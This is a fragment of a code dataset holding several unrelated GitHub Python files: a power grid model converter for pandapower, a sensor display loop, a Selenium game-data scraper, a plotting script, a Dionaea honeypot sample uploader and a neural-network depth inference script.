next_node = find_next_node(CN, TE)\r\n        try:\r\n            if next_node.CE_type == 'BusbarSection':\r\n                CN_attached_to_busbar_list.append(CN)\r\n                CN_name.append(CN.name)\r\n        except:\r\n            pass\r\n#print(CN_attached_to_busbar_list)\r\nprint(CN_name)\r\n\r\nCN_not_attached_to_busbar = []\r\nCN_not_name = []\r\n\r\nfor CN in ConnectivityNode_list:\r\n    if CN not in CN_attached_to_busbar_list:\r\n        CN_not_name.append(CN.name)\r\n        CN_not_attached_to_busbar.append(CN)\r\n\r\n\r\n#print(CN_not_attached_to_busbar)\r\nprint(CN_not_name)\r\n\r\n# Initialize an empty stack\r\nAll_stack = []\r\n\r\n# Traverse through the ConnectivityNode_list and its attached terminals to create stacks of connected elements\r\n# Each stack represents a connected path in the network\r\n# Store all the created stacks in the All_stack list\r\n\r\nfor CN in ConnectivityNode_list:\r\n    if Num_attached_terminal_of_CN(CN) > 0:\r\n        for TE in find_Terminal_attached_to_CN_list(CN):\r\n            if TE.traversal_flag == 0:\r\n                current_node = CN\r\n                CN.Num_attachTerms -= 1 \r\n                TE.traversal_flag = 1\r\n                previous_node = current_node\r\n                current_node = TE\r\n                next_node = find_next_node(previous_node, current_node) \r\n                CN_CE_stack = [CN]\r\n                CN_CE_stack.append(next_node)\r\n                CE = next_node \r\n                try:\r\n                    if Num_attached_terminal_of_CE(CE) > 1:\r\n                        for TE in find_Terminal_attached_to_ConductingEquipment_list(CE):\r\n                            if TE.traversal_flag == 0: \r\n                                TE.traversal_flag = 1\r\n                                next_node = find_next_node(CE, TE)\r\n                                CN_CE_stack.append(next_node)\r\n                except:\r\n                    pass\r\n\r\n                if CN_CE_stack not in All_stack: \r\n                    All_stack.append(CN_CE_stack)\r\nprint(All_stack)\r\n\r\n#Create network in Pandapower.\r\n\r\nimport pandapower.networks\r\nfrom pandapower.plotting import simple_plot\r\nfrom pandapower.plotting.plotly import vlevel_plotly, simple_plotly\r\nfrom pandapower.networks import mv_oberrhein\r\nimport pandapower as pp\r\n\r\n# create component for panda power\r\nnet = pp.create_empty_network()\r\n\r\n# create busbar 'b' and node 'n'\r\n\r\nfor Busbar_Section in BusbarSection_list:\r\n    pp.create_bus(net, name=Busbar_Section.name, vn_kv=Busbar_Section.voltage, type=\"b\")\r\n\r\nfor CN in CN_not_attached_to_busbar:\r\n    pp.create_bus(net, name=CN.name, vn_kv=CN.voltage, type=\"n\")\r\n\r\nprint(net.bus)\r\n\r\n# Define function to find the busbar for a connectivity node attached to a terminal\r\n\r\ndef find_busbar_for_connectivity_node(CN):\r\n    lista = find_Terminal_attached_to_CN_list(CN)\r\n    for TE in lista:\r\n        bus = find_next_node(CN, TE)\r\n        try:\r\n            if bus.CE_type == 'BusbarSection':\r\n                return(pp.get_element_index(net, \"bus\", bus.name))\r\n            if bus.CE_type == 'Breaker':\r\n                return(pp.get_element_index(net, \"bus\", CN.name))\r\n        except:\r\n            pass\r\n\r\n# The ACLineSegment, breaker and transformer are conducting equipment that comes between two CNs,\r\n# hence, we consider item[0] and item[-1].\r\n\r\n# create line\r\nfor item in All_stack:\r\n    for lines in item:\r\n        try:\r\n            if lines.CE_type == 'ACLineSegment':\r\n                pp.create_line(net, find_busbar_for_connectivity_node(item[0]), find_busbar_for_connectivity_node(\r\n                    item[-1]), length_km=2, std_type=\"N2XS(FL)2Y 1x300 RM/35 64/110 kV\", name=lines.name)\r\n        except:\r\n            pass\r\nprint(net.line)\r\n\r\n\r\n\r\n# create breaker\r\nfor item in All_stack:\r\n    for breaker in item:\r\n        try:\r\n            if breaker.CE_type == 'Breaker':\r\n                if breaker.state == 'false':\r\n                    pp.create_switch(net, find_busbar_for_connectivity_node(item[0]), find_busbar_for_connectivity_node(item[-1]), et=\"b\", type=\"CB\", closed=True)\r\n                if 
breaker.state == 'true':\r\n                    pp.create_switch(net, find_busbar_for_connectivity_node(item[0]), find_busbar_for_connectivity_node(item[-1]), et=\"b\", type=\"CB\", closed=False)\r\n        except:\r\n            pass\r\nprint(net.switch)\r\n\r\n# create transformer\r\n\r\n# For transformers the high and low voltage busbars need to be determined\r\n\r\nfor item in All_stack:\r\n    for transformer in item:\r\n        try:\r\n            if transformer.CE_type == 'Transformer':\r\n                if item[0].voltage > item[2].voltage:\r\n                    busbar_hv = find_busbar_for_connectivity_node(item[0])\r\n                    busbar_lv = find_busbar_for_connectivity_node(item[2])\r\n                else:\r\n                    busbar_hv = find_busbar_for_connectivity_node(item[2])\r\n                    busbar_lv = find_busbar_for_connectivity_node(item[0])\r\n                pp.create_transformer(\r\n                    net, busbar_hv, busbar_lv, name=transformer.name, std_type=\"25 MVA 110/20 kV\")\r\n        except:\r\n            pass\r\n\r\nprint(net.trafo)\r\n\r\n# The Load, Synchronous generator and shunt compensator are end devices and hence we use only item[0]\r\n\r\n# create load\r\nfor item in All_stack:\r\n    for load in item:\r\n        try:\r\n            if load.CE_type == 'load':\r\n                pp.create_load(net, find_busbar_for_connectivity_node(item[0]), load.p, load.q, scaling=0.6, name=load.name)\r\n        except:\r\n            pass\r\nprint(net.load)\r\n\r\n# create generators\r\ncheck = []\r\nfor item in All_stack:\r\n    for generator in item:\r\n        try:\r\n            if generator.CE_type == 'SynchronousMachine':\r\n                check.append(generator)\r\n                pp.create_sgen(net, find_busbar_for_connectivity_node(item[0]), p_mw=0.9, q_mvar=0.9, name=generator.name)\r\n        except:\r\n            pass\r\nprint(net.sgen)\r\n\r\n# create Compensator\r\nfor item in All_stack:\r\n    for Compensator in item:\r\n        try:\r\n            if Compensator.CE_type == 'Compensator':\r\n                pp.create_shunt(net, find_busbar_for_connectivity_node(item[0]), q_mvar=0.01*Compensator.q, p_mw=0, name=Compensator.name)\r\n        except:\r\n            pass\r\n\r\nprint(net.shunt)\r\n\r\nprint(net)\r\n\r\n# plot the network\r\npp.plotting.simple_plot(net)", "repo_name": "SarikaVG/Assignment_1_EH2745_Amritha-Sarika", "sub_path": "Assignment_1_EH2745.py", "file_name": "Assignment_1_EH2745.py", "file_ext": "py", "file_size_in_byte": 26818, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "tkinter.ttk.Frame", "line_number": 20, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 20, "usage_type": "name"}, {"api_name": "tkinter.ttk.Frame", "line_number": 21, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 21, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 23, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 23, "usage_type": "name"}, {"api_name": "tkinter.filedialog.askopenfilename", "line_number": 30, "usage_type": "call"}, {"api_name": "tkinter.filedialog", "line_number": 30, "usage_type": "name"}, {"api_name": "tkinter.filedialog.askopenfilename", "line_number": 36, "usage_type": "call"}, {"api_name": "tkinter.filedialog", "line_number": 36, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.parse", "line_number": 52, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 52, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.parse", "line_number": 53, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 53, "usage_type": "name"}, {"api_name": "BusbarSection.BusbarSection", "line_number": 121, "usage_type": "call"}, {"api_name": "ACLineSegment.ACLineSegment", "line_number": 131, 
"usage_type": "call"}, {"api_name": "Breaker.Breaker", "line_number": 146, "usage_type": "call"}, {"api_name": "EnergyConsumer.EnergyConsumer", "line_number": 154, "usage_type": "call"}, {"api_name": "GeneratingUnit.GeneratingUnit", "line_number": 164, "usage_type": "call"}, {"api_name": "LinearShuntCompensator.LinearShuntCompensator", "line_number": 176, "usage_type": "call"}, {"api_name": "VoltageLevel.VoltageLevel", "line_number": 189, "usage_type": "call"}, {"api_name": "PowerTransformer.PowerTransformer", "line_number": 199, "usage_type": "call"}, {"api_name": "RatioTapChanger.RatioTapChanger", "line_number": 208, "usage_type": "call"}, {"api_name": "SynchronousMachine.SynchronousMachine", "line_number": 222, "usage_type": "call"}, {"api_name": "BaseVoltage.BaseVoltage", "line_number": 233, "usage_type": "call"}, {"api_name": "ConnectivityNode.ConnectivityNode", "line_number": 241, "usage_type": "call"}, {"api_name": "Terminal.Terminal", "line_number": 250, "usage_type": "call"}, {"api_name": "Terminal.Terminal", "line_number": 270, "usage_type": "call"}, {"api_name": "EnergyConsumer.EnergyConsumer", "line_number": 275, "usage_type": "call"}, {"api_name": "RatioTapChanger.RatioTapChanger", "line_number": 282, "usage_type": "call"}, {"api_name": "Breaker.Breaker", "line_number": 289, "usage_type": "call"}, {"api_name": "Breaker.Breaker", "line_number": 292, "usage_type": "argument"}, {"api_name": "pandapower.create_empty_network", "line_number": 469, "usage_type": "call"}, {"api_name": "pandapower.create_bus", "line_number": 474, "usage_type": "call"}, {"api_name": "pandapower.create_bus", "line_number": 477, "usage_type": "call"}, {"api_name": "pandapower.get_element_index", "line_number": 489, "usage_type": "call"}, {"api_name": "pandapower.get_element_index", "line_number": 491, "usage_type": "call"}, {"api_name": "pandapower.create_line", "line_number": 503, "usage_type": "call"}, {"api_name": "pandapower.create_switch", "line_number": 517, "usage_type": "call"}, {"api_name": "pandapower.create_switch", "line_number": 519, "usage_type": "call"}, {"api_name": "pandapower.create_transformer", "line_number": 539, "usage_type": "call"}, {"api_name": "pandapower.create_load", "line_number": 553, "usage_type": "call"}, {"api_name": "pandapower.create_sgen", "line_number": 565, "usage_type": "call"}, {"api_name": "pandapower.create_shunt", "line_number": 575, "usage_type": "call"}, {"api_name": "pandapower.plotting.simple_plot", "line_number": 584, "usage_type": "call"}, {"api_name": "pandapower.plotting", "line_number": 584, "usage_type": "attribute"}]} +{"seq_id": "33900519074", "text": "import influxdb\nimport serial\nimport time\nfrom datetime import datetime\n\nhost = ''\nport = 8086\ndatabase = ''\nusername = ''\npassword = ''\ndevice1 = ''\ndevice2 = ''\ndevice3 = ''\nmeasurement = ''\nt = 'time'\n\nwhile True:\n\tclient = influxdb.InfluxDBClient(host=host, port=port, database=database, \n\tusername=username, password=password)\n\n\tresults = client.query((\"SELECT time, %s,%s,%s FROM %s ORDER BY time DESC LIMIT 1\") % \n\t\t\t\t(device1, device2, device3, measurement))\n\tpoints = results.get_points()\n\n\tfor item in points:\n\t a = (item[device1])\n\t b = (item[device2])\n\t c = (item[device3])\n\t tm = (item[t])\n\t \n\t #print \"Udaje boli namerane \" + tm\n\t #print a\n\t #print b\n\t #print c\n\n\tclient.close()\n\n#---------Display-----------#\n\t\n\t#Set end of file\n\teof = \"\\xff\\xff\\xff\"\n\n\tcon = serial.Serial(\n\n\t port='/dev/serial0',\n\t baudrate=9600,\n\t 
parity=serial.PARITY_NONE,\n\t    stopbits=serial.STOPBITS_ONE,\n\t    bytesize=serial.EIGHTBITS,\n\t)\n\n\talt1 = 'page0.t1.txt=\"'+str(a)+'\"'+eof\n\talt2 = 'page0.t2.txt=\"'+str(b)+'\"'+eof\n\talt3 = 'page0.t3.txt=\"'+str(c)+'\"'+eof\n\n\tcon.write(alt1)\n\tcon.write(alt2)\n\tcon.write(alt3)\n\t\n\t#undimCmd = \"dim=30\"\n\t#con.write(undimCmd + eof) #set screen brightness to 30%\n\n\ttime.sleep(60)\n", "repo_name": "hwebSK/Nextion-display-Raspberry-Pi-python", "sub_path": "read_influxdb_data_to_nextion.py", "file_name": "read_influxdb_data_to_nextion.py", "file_ext": "py", "file_size_in_byte": 1237, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "influxdb.InfluxDBClient", "line_number": 18, "usage_type": "call"}, {"api_name": "serial.Serial", "line_number": 43, "usage_type": "call"}, {"api_name": "serial.PARITY_NONE", "line_number": 47, "usage_type": "attribute"}, {"api_name": "serial.STOPBITS_ONE", "line_number": 48, "usage_type": "attribute"}, {"api_name": "serial.EIGHTBITS", "line_number": 49, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 63, "usage_type": "call"}]}
+{"seq_id": "71276812006", "text": "from webdriver_manager.chrome import ChromeDriverManager\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.service import Service\nfrom time import *\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.action_chains import ActionChains\n\n# launch browser\noptions = webdriver.ChromeOptions()\noptions.add_argument(\"--start-maximized\")\noptions.add_argument('--log-level=3')\ndriver = webdriver.Chrome(service=Service(ChromeDriverManager().install()), options=options)\n# driver.get(\"https://www.leagueofgraphs.com\")\ndriver.get(\"https://www.leagueofgraphs.com/tft/champions\")\ndriver.implicitly_wait(5)\n\n# interact with the browser\ndef getOneChampMain(champ):\n    search = driver.find_element('xpath', \"/html/body/div[2]/div[3]/div[2]/div[1]/div/form/input\")\n    search.send_keys(str(champ))\n    search.send_keys(Keys.RETURN)\n    button = driver.find_element('xpath', \"/html/body/div[2]/div[3]/div[3]/div[2]/div[2]/div/div[2]/div[5]/table/tbody/tr[12]/td/a/button\")\n    button.click()\n    try:\n        table = WebDriverWait(driver, 10).until(\n            EC.presence_of_element_located((By.XPATH, \"/html/body/div[2]/div[3]/div[3]/div[2]/div[2]/div[1]/div/div/table\"))\n        )\n    except:\n        driver.quit()\n    names = table.find_elements(By.CLASS_NAME, 'name')\n    res = []\n    i = 1\n    for name in names:\n        res.append(f'Top {i}: {name.text}')\n        i += 1\n    return res\n\ndef delayedElement(by, path):\n    try:\n        element = WebDriverWait(driver, 10).until(\n            EC.presence_of_element_located((by, path))\n        )\n    except:\n        driver.quit()\n    return element\n\ndef getChampInfo():\n    # ability_image = driver.find_element(By.XPATH, \"/html/body/div[2]/div[3]/div[3]/div[2]/div[2]/div/div[1]/div[2]/div[1]\").find_element(By.TAG_NAME, \"img\").get_attribute(\"src\") \n    ability_desc = driver.find_element(By.CLASS_NAME, \"abilityDescription\").text\n    tier = driver.find_element(By.CLASS_NAME, \"solo-number\").text\n    champ_class = driver.find_element(By.CLASS_NAME, \"bannerSubtitle\").text\n    # champ_image = driver.find_element(By.XPATH, \"/html/body/div[2]/div[3]/div[1]/div/div[1]/div/img\").get_attribute('src')\n    champ = driver.find_element(By.CLASS_NAME, 
\"pageBanner\").find_element(By.TAG_NAME, 'h2').text\n return {\n 'name': champ,\n 'class': champ_class,\n 'tier': tier,\n 'description': ability_desc\n }\n\ntable = driver.find_element(By.XPATH, \"/html/body/div[2]/div[3]/div[3]/div[2]/div[2]/div/div/div/table\")\nchamps = table.find_elements(By.CLASS_NAME, 'name')\nchamp_data = []\nfor champ in champs:\n champ.click()\n champ_data.append(getChampInfo())\n driver.back()\n\nwith open(\"tftdata.txt\", \"w\") as file:\n file.write(str(champ_data))\n file.close()\n\nwhile(True):\n pass", "repo_name": "duc-minh-droid/selenium-tut", "sub_path": "tft-data/tftcrawling.py", "file_name": "tftcrawling.py", "file_ext": "py", "file_size_in_byte": 3073, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "selenium.webdriver.ChromeOptions", "line_number": 12, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 12, "usage_type": "name"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 15, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 15, "usage_type": "name"}, {"api_name": "selenium.webdriver.chrome.service.Service", "line_number": 15, "usage_type": "call"}, {"api_name": "webdriver_manager.chrome.ChromeDriverManager", "line_number": 15, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.keys.Keys.RETURN", "line_number": 24, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.keys.Keys", "line_number": 24, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.ui.WebDriverWait", "line_number": 28, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.presence_of_element_located", "line_number": 29, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 29, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 29, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 29, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CLASS_NAME", "line_number": 33, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 33, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.ui.WebDriverWait", "line_number": 43, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.presence_of_element_located", "line_number": 44, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 44, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CLASS_NAME", "line_number": 52, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 52, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CLASS_NAME", "line_number": 53, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 53, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CLASS_NAME", "line_number": 54, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 54, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CLASS_NAME", "line_number": 56, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 56, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.TAG_NAME", "line_number": 56, "usage_type": "attribute"}, {"api_name": 
"selenium.webdriver.common.by.By.XPATH", "line_number": 64, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 64, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CLASS_NAME", "line_number": 65, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 65, "usage_type": "name"}]} +{"seq_id": "13563137223", "text": "import numpy as np\nimport matplotlib.pyplot as plt\n\ndata_kl =np.loadtxt(\"sigmas_kl.txt\" ,unpack=True)\ndata_tm =np.loadtxt(\"sigmas_tm.txt\" ,unpack=True)\ndata_klsn=np.loadtxt(\"sigmas_klsn.txt\",unpack=True)\nplt.plot(data_kl[0],data_kl[1]/data_kl[1,-1]-1,'ro-',lw=2,label='${\\\\rm K-L\\\\,\\\\,decomp.\\\\,\\\\,for\\\\,\\\\,}f_{\\\\rm NL}$',markeredgewidth=0)\nplt.plot(data_tm[0],data_tm[1]/data_tm[1,-1]-1,'bo-',lw=2,label='${\\\\rm Tomography}$',markeredgewidth=0)\nplt.plot(data_klsn[0],data_klsn[1]/data_klsn[1,-1]-1,'o-',color='#AAAAAA',lw=2,label='${\\\\rm K-L\\\\,\\\\,decomp.\\\\,\\\\,for\\\\,\\\\,}S/N$',markeredgewidth=0)\nplt.legend(loc='lower left',frameon=False,fontsize=18)\nplt.xlabel('${\\\\rm Number\\\\,\\\\,of\\\\,\\\\,modes}$',fontsize=18)\nplt.ylabel('$\\\\Delta\\\\sigma(f_{\\\\rm NL})/\\\\sigma_{\\\\rm best}(f_{\\\\rm NL})$',fontsize=18)\nplt.xlim([0.9,14.1])\nplt.ylim([2E-3,10])\nplt.yscale('log')\nplt.savefig(\"../Draft/Figs/kl_fnl.pdf\",bbox_inches='tight')\nplt.show()\n", "repo_name": "damonge/PH_KL", "sub_path": "LSSTred/plot_fnl.py", "file_name": "plot_fnl.py", "file_ext": "py", "file_size_in_byte": 935, "program_lang": "python", "lang": "ja", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.loadtxt", "line_number": 4, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 5, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 6, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 7, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 7, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 8, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 8, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 9, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 9, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 10, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 10, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 11, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 11, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 12, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 12, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 13, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 13, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 14, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 14, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.yscale", "line_number": 15, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 15, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 16, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 16, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 17, "usage_type": "call"}, 
{"api_name": "matplotlib.pyplot", "line_number": 17, "usage_type": "name"}]} +{"seq_id": "20983881594", "text": "import watchdog.events \nimport watchdog.observers \nimport time\nimport requests\nimport json\nimport base64\nimport hashlib\nimport time\nfrom datetime import datetime\nfrom configparser import ConfigParser\nimport os\nfrom pathlib import Path\n\nDIRS_TO_MONITOR = [\nr\"/opt/dionaea/var/lib/dionaea/binaries\", \nr\"/opt/dionaea/var/lib/dionaea/ftp/root\",\nr\"/opt/dionaea/var/lib/dionaea/http/root\",\nr\"/opt/dionaea/var/lib/dionaea/tftp/root\",\nr\"/opt/dionaea/var/lib/dionaea/sip/rtp\",\nr\"/opt/dionaea/var/lib/dionaea/upnp/root\"\n]\n\nHONEY_AGENT_CONFIG_PATH\t= r\"/opt/honeyagent/honeyagent.conf\"\n\nconfig = ConfigParser()\nconfig.read(HONEY_AGENT_CONFIG_PATH)\nTOKEN = config['HONEYNODE']['TOKEN']\nWEB_SERVER_IP = config['WEB-SERVER']['SERVER_IP']\nWEB_SERVER_PORT = config['WEB-SERVER']['PORT']\nAPI_ENDPOINT_URL = \"http://{0}:{1}/api/v1/dionaea-binary-upload\".format(WEB_SERVER_IP, WEB_SERVER_PORT)\n\n\ndef md5(fname):\n hash_md5 = hashlib.md5()\n with open(fname, \"rb\") as f:\n for chunk in iter(lambda: f.read(4096), b\"\"):\n hash_md5.update(chunk)\n return hash_md5.hexdigest()\n \n \nclass Handler(watchdog.events.PatternMatchingEventHandler): \n def __init__(self, pattern): \n # Set the patterns for PatternMatchingEventHandler\n self.pattern = pattern\n watchdog.events.PatternMatchingEventHandler.__init__(self, patterns=self.pattern, \n ignore_directories=True, case_sensitive=False) \n \n def on_created(self, event):\n if not \"httpupload\" in event.src_path and not \".tmp\" in event.src_path:\n print(\"Watchdog received created event - % s\" % event.src_path)\n\n time.sleep(3) # preventing the script from reading the malware file before the malware file is fully uploaded\n\n with open(event.src_path, 'rb') as malware_file:\n malware_file_base64 = base64.b64encode(malware_file.read())\n \n print(malware_file_base64)\n malware_file_base64_string = malware_file_base64.decode('utf-8')\n\n data = {\n 'file': malware_file_base64_string, \n 'token': TOKEN, \n 'time': datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"), \n 'md5': md5(event.src_path)\n }\n\n try:\n headers = {'content-type': 'application/json'}\n r = requests.post(API_ENDPOINT_URL, data=json.dumps(data), headers=headers)\n print(r.text)\n\n finally:\n malware_file.close()\n parent_path = str(Path(event.src_path).parent)\n file_list = [f for f in os.listdir(parent_path)]\n for f in file_list:\n os.remove(os.path.join(parent_path, f))\n \n \nif __name__ == \"__main__\": \n try: \n event_handler = Handler(['*'])\n observer = watchdog.observers.Observer()\n for DIR in DIRS_TO_MONITOR: \n observer.schedule(event_handler, path=DIR, recursive=True) \n observer.start() \n except KeyboardInterrupt: \n observer.stop() \n observer.join() \n", "repo_name": "zql2532666/HoneyIDS", "sub_path": "app/deployment_scripts/dionaea_binary_uploader.py", "file_name": "dionaea_binary_uploader.py", "file_ext": "py", "file_size_in_byte": 3128, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "configparser.ConfigParser", "line_number": 25, "usage_type": "call"}, {"api_name": "hashlib.md5", "line_number": 34, "usage_type": "call"}, {"api_name": "watchdog.events.events", "line_number": 41, "usage_type": "attribute"}, {"api_name": "watchdog.events", "line_number": 41, "usage_type": "name"}, {"api_name": 
"watchdog.events.events.PatternMatchingEventHandler.__init__", "line_number": 45, "usage_type": "call"}, {"api_name": "watchdog.events.events", "line_number": 45, "usage_type": "attribute"}, {"api_name": "watchdog.events", "line_number": 45, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 52, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 55, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 63, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 63, "usage_type": "name"}, {"api_name": "requests.post", "line_number": 69, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 69, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 74, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 75, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 77, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 77, "usage_type": "call"}, {"api_name": "os.path", "line_number": 77, "usage_type": "attribute"}, {"api_name": "watchdog.events.observers.Observer", "line_number": 83, "usage_type": "call"}, {"api_name": "watchdog.events.observers", "line_number": 83, "usage_type": "attribute"}, {"api_name": "watchdog.events", "line_number": 83, "usage_type": "name"}]} +{"seq_id": "5722605070", "text": "\"Precess input folder\"\nimport os\nimport time\nfrom pathlib import Path\nfrom shutil import rmtree, copytree\nfrom PIL import Image\nimport numpy as np\nimport cv2\n\nfrom inference.config import H_MODEL_FILE, L_MODEL_FILE, _DEBUG\nfrom inference.utils import make_grayscale, resize\nfrom inference.masking import mask\nfrom inference.depth import nn_depth\nfrom inference.pointcloud import nngenerate_pointcloud\n\n#from filter.masks import addmask_to_picture\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\n#os.environ['TF_CPP_MIN_LOG_LEVEL'] = '1' # more logging\n# disable cuda\n#os.environ['CUDA_VISIBLE_DEVICES'] = \"-1\"\nimport tensorflow as tf\n#_DEBUG=True\n_PERF = True\n_FILTER = True\n\nTF_VERBOSE=1 # progress bar\nTF_VERBOSE=0 # silent\nTF_VERBOSE=2 # 1 line\n\nPI = 2*np.pi\n\n# load model 1 time for all\nL_model = tf.keras.models.load_model(L_MODEL_FILE)\nH_model = tf.keras.models.load_model(H_MODEL_FILE)\n\n# def load_models():\n# global L_model, H_model\n# L_model = tf.keras.models.load_model(L_MODEL_FILE)\n# H_model = tf.keras.models.load_model(H_MODEL_FILE)\n\ndef db_kinfer(x):\n \"run L-model\"\n predicted_img = L_model.predict(np.array([np.expand_dims(x, -1)]),verbose=TF_VERBOSE)\n predicted_img = np.argmax(predicted_img, axis=-1)\n predicted_img = predicted_img.squeeze()\n return predicted_img\n\ndef process(folder, outfolder=None):\n \"Procss the folder with hole inference\"\n if not folder.exists():\n raise Exception('Input folder dont exist')\n if outfolder is None:\n outfolder = folder\n if _DEBUG:\n print(\"Starting processing\", folder, outfolder)\n #load_models()\n image0 = folder / 'image0.png'\n img = cv2.imread(str(image0)).astype(np.float32)\n #img = resize(img, 160, 160)\n img = make_grayscale(img)\n if _DEBUG:\n cv2.imwrite(str(outfolder / 'gray.png'), img)\n inp_img = img/255\n mymask = mask(folder, outfolder)\n inp_img = np.multiply(np.logical_not(mymask), inp_img)\n wrap_input = H_model.predict(np.array([np.expand_dims(inp_img, -1)]),verbose=TF_VERBOSE)\n wrap_input = wrap_input.squeeze()\n wrap_input = np.multiply(np.logical_not(mymask), wrap_input)\n if _DEBUG:\n cv2.imwrite(str(outfolder / 'wrapin.png'), 255*wrap_input)\n 
#print(inpfile)\n    # mymask = mask(inFolder + '/render'+str(i)+'/')\n    # inp_img = np.multiply(np.logical_not(mymask), inp_img)\n    k_img = db_kinfer(wrap_input)\n    unwrapdata = np.add(2*TWO_PI*wrap_input, np.multiply(2*TWO_PI, k_img))\n    if _DEBUG:\n        cv2.imwrite(str(outfolder / 'unwrap.png'), unwrapdata)\n        cv2.imwrite(str(outfolder / 'k.png'), k_img)\n    nndepth = nn_depth(depthoutfolder=outfolder, unwrap=0.50*unwrapdata, basecount=50)\n    nngenerate_pointcloud(folder / 'image8.png', outfolder / 'mask.png', nndepth, outfolder / 'pointcloud.ply')\n\n########### testing ############\n\ndef process_testimage():\n    \"process one image folder\"\n    testfolder = Path(__file__).parent.parent / 'testdata/testtarget/render0'\n    tmp_folder = Path(__file__).parent.parent / 'tmp'\n    rmtree(tmp_folder, ignore_errors=True)\n    copytree(testfolder, tmp_folder)\n    myoutfolder = tmp_folder / 'out'\n    myoutfolder.mkdir()\n    if _PERF:\n        proc_st = time.process_time()\n        st_time = time.time()\n    process(tmp_folder, myoutfolder)\n    if _PERF:\n        end_time = time.time()\n        proc_end = time.process_time()\n        print(\"CPU exec time:\", proc_end-proc_st, \"seconds\")\n        print(\"Elapsed time:\", end_time-st_time, \"seconds\")\n    